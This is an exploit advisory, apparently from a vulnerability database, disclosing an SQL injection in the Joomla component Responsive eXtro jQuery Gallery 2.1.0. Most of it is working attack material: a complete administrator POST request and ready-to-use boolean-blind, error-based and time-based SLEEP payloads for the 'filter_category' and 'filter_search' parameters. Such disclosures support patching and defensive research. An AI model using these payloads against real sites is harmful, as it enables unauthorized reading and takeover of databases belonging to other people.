Joomla Component Responsive eXtro jQuery Gallery 2.1.0 filter_category SQL Injection

2018.10.27
Credit: AkkuS
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Joomla Component Responsive eXtro jQuery Gallery 2.1.0 - 'filter_category' SQL Injection # Dork: N/A # Date: 2018-10-25 # Exploit Author: Özkan Mustafa Akkuş (AkkuS) # Contact: https://pentest.com.tr # Vendor Homepage: https://extro.media/ # Software Link: https://demo.extro.media/responsive-joomla-extensions-en/responsive-gallery # Version: 2.1.0 # Category: Webapps # Tested on: Kali linux # Description : An attacker can execute SQL commands through parameters that contain vulnerable. # An authorized user can use the filtering feature and can fully authorize # the database or other server informations. # 'filter_category' and 'filter_search' parameters have the same vulnerable. # PoC : SQLi : POST /administrator/index.php?option=com_emgallery&view=emgallery HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://TARGET/administrator/index.php?option=com_emgallery Cookie: 2e7fc5dc4e4ce76c3319e1db921484ac=eqgcirsi6m53s6vbi7bbgng1n5; 48bd4f2f65b6c84d32f8704444f9b24c=pmt3k8q4qv1o7of19d2cjo6p21 Connection: keep-alive Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 151 filter_category=0&filter_search=&list%5Blimit%5D=100&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0e53a883a46b480b689e343b1c8a401=1 # Parameter: filter_category (POST) # Type: boolean-based blind # Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) # Payload: filter_category=-7022 OR 5787=5787#&filter_search=&list%5Blimit%5D=100&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0e53a883a46b480b689e343b1c8a401=1 # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) # Payload: filter_category=1 AND (SELECT 5756 FROM(SELECT COUNT(*),CONCAT(0x7162706271,(SELECT(ELT(5756=5756,1))),0x7170706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&filter_search=&list%5Blimit%5D=100&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0e53a883a46b480b689e343b1c8a401=1 # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload: filter_category=1 AND SLEEP(5)&filter_search=&list%5Blimit%5D=100&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0e53a883a46b480b689e343b1c8a401=1 # Parameter: filter_search (POST) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) # Payload: filter_category=0&filter_search=" AND 8748=8748#&list%5Blimit%5D=100&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0e53a883a46b480b689e343b1c8a401=1 # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) # Payload: filter_category=0&filter_search=" AND (SELECT 2429 FROM(SELECT COUNT(*),CONCAT(0x71766b7671,(SELECT(ELT(2429=2429,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--zyPZ&list%5Blimit%5D=100&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0e53a883a46b480b689e343b1c8a401=1 # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload: filter_category=0&filter_search=" AND SLEEP(5)--fDVO&list%5Blimit%5D=100&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0e53a883a46b480b689e343b1c8a401=1


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top